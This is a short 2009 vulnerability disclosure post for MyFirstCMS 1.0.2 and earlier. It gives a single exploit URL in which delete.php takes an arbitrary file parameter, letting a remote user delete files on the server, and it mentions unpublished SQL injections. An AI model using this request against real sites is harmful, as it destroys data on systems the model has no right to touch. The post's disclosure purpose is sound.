MyFirstCMS <= 1.0.2 Remote Arbitrary File Delete Vulnerability

2009-05-26 17:00:37

--+++==========================================================================+++--
--+++========== MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability ==========+++--
--+++==========================================================================+++--


[+] Author : darkjoker
[+] Site : http://darkjoker.net23.net
[+] Download : http://ostatic.com/myfirstcms


[+] Short note:
This CMS also has other vulnerabilities, such as SQL Injections, but,
unfortuntaly, who wrote this CMS was a bit an idiot, because declared
functions called, for example, 'try', forgot some ';' or '}' somewhere...
Call me lazy or what you want but I don't want to spend time fixing a CMS
just for code an exploit ...

[+] Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.